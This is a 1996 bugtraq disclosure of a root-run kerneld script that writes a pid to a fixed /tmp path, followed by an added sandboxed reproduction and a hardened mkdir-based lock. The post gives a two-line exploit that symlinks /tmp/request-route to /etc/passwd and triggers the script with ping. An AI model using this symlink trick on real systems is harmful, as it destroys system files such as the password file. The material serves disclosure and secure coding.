List: bugtraq
Subject: [linux-security] Big security hole in kerneld's request_route
From: "Igor Chudov () home" <ichudov () algebra ! com>
Date: 1996-06-13 17:51:57
-----BEGIN PGP SIGNED MESSAGE-----
Hi,
I was just looking at sources of newly released linux 2.0.
In modules-1.3.69k, in kerneld's subdirectory, there is a file
request_route.sh (see below). It's supposed to run as root, whenever
a route is requested. It is supposed to start pppd or something like
that.
As it appears, it is possible to destroy system philes (such as /etc/passwd
and so on).
Condition: you must have a system which has "on-demand loading" of pppd,
whenever a route is requested.
Exploit:
you$ ln -s /etc/passwd /tmp/request-route
you$ ping 204.251.80.30
Internally kerneld starts request_route, request_route writes pid
to the symlinked file, and the file pointed to by symlink is overwritten.
Did I miss something?
- Igor.
#! /bin/sh
LOCK=/tmp/request-route
PATH=/usr/sbin:$PATH # for ppp-2.2*
export PATH
# Note: you are _not_ forced to use ppp!
# You can do whatever you want in order to satisfy the kernel route request.
# It might be a good idea to set up the route as the default route, in case
# you are using e.g. slip or plip or any other net driver...
#
# This script will be called from kerneld with the requested route as $1
# Create a chat script for your nameserver (as defined in /etc/resolv.conf)
#
chatfile=/etc/ppp/chat.$1
if [ -f $chatfile ]
then
    #
    # Tune your favourite parameters to pppd, including the idle-disconnect option.
    # Kerneld will be automatically triggered to load slhc.o and ppp.o
    #
    pppd connect "chat -f $chatfile" /dev/modem 38400 \
        idle-disconnect 600 modem defaultroute noipdefault \
        & # let pppd detach itself whenever it wants to...
    #
    # Timer to be killed by ip-up, tunable! Check kerneld delay as well
    #
    sleep 60 &
    sleepid=$!
    echo $sleepid > $LOCK
    wait $sleepid
    rm -f $LOCK
    exit 0
else
    exit 1
fi
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
iQCVAwUBMb+XDMJFmFyXKPzRAQHLzwP9HAD/WCkirGpBUjLXIdcmhQcQMf3eJMDk
Y5tU/7KkXR2afOmEncZEQs57FOhHaVtDiAMZ0B25Dn0ef6qhbYSS3wjzjh2V8m0d
OHxnoRHTSApM1mQA2WFPYkzfqmFHXzQBHur6xNkl6JcJ9FiLFSQp3cQBjgcafX0C
CaDXkJNTNSI=
=8zfD
-----END PGP SIGNATURE-----
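The overwrite Igor describes, reproduced below as an added example that is not part of the original post or of modules-1.3.69k. Everything runs inside a throwaway directory created with mktemp, so "/tmp" and "/etc/passwd" are stand-ins and nothing on the real system is touched (the sandbox layout, the function names and the lock-directory scheme are this example's own assumptions, not anything from the kerneld sources). The first half performs the same write request_route.sh does, "echo $pid > $LOCK", through a planted symlink and shows the target being truncated; the second half shows the fix a practitioner would apply: take the lock with mkdir, which is atomic and never follows a symlink, and put the pid file inside the directory that mkdir just created, so a path pre-planted by an unprivileged user is simply refused.

```shell
#!/bin/sh
# Added example, not from the original post or from modules-1.3.69k.
# Reproduces the symlink clobber from request_route.sh in a scratch
# directory, then shows a lock-taking pattern that does not follow symlinks.

# Build the sandbox: a fake /tmp, a fake /etc/passwd, and the attacker's
# symlink "ln -s /etc/passwd /tmp/request-route" from the post (assumption:
# the real paths are replaced by $SANDBOX/tmp and $SANDBOX/etc/passwd).
setup() {
    SANDBOX=$(mktemp -d) || exit 1
    mkdir "$SANDBOX/tmp" "$SANDBOX/etc"
    printf 'root:x:0:0:root:/root:/bin/sh\n' > "$SANDBOX/etc/passwd"
    ln -s "$SANDBOX/etc/passwd" "$SANDBOX/tmp/request-route"
}

# The vulnerable pattern: write a pid through a fixed, world-writable path.
# The shell opens $lock with O_TRUNC, following whatever symlink is there.
vulnerable_write() {
    lock="$1"
    echo "$$" > "$lock"
}

# The hardened pattern: mkdir(2) fails with EEXIST if anything, a symlink
# included, already sits at the path, and it never follows a symlink on
# the final component. Only after mkdir succeeds is the pid written, into
# a file inside the directory this process just created. Returns 1 if the
# lock path was already taken.
safe_write() {
    lockdir="$1"
    if ! mkdir "$lockdir" 2>/dev/null; then
        echo "refusing: $lockdir already exists (symlink or stale lock)" >&2
        return 1
    fi
    echo "$$" > "$lockdir/pid"
    return 0
}

# Returns 0 if the fake passwd file still holds its original root entry.
passwd_intact() {
    grep -q '^root:x:0:0:' "$1"
}

demo() {
    setup
    vulnerable_write "$SANDBOX/tmp/request-route"
    if passwd_intact "$SANDBOX/etc/passwd"; then
        echo "vulnerable pattern: passwd unexpectedly intact"
    else
        echo "vulnerable pattern: $SANDBOX/etc/passwd overwritten with pid $$"
    fi
    rm -rf "$SANDBOX"

    setup
    if safe_write "$SANDBOX/tmp/request-route"; then
        echo "hardened pattern: lock taken through planted symlink?!"
    else
        echo "hardened pattern: planted symlink refused"
    fi
    passwd_intact "$SANDBOX/etc/passwd" && echo "hardened pattern: passwd intact"
    rm -rf "$SANDBOX"
}

demo
```

The mkdir trick is only half of the fix; the other half is not placing the lock in /tmp at all. A root-run helper should keep its state under a directory that unprivileged users cannot write to (for example a root-owned spool or run directory), which removes the attacker's ability to pre-plant anything in the first place.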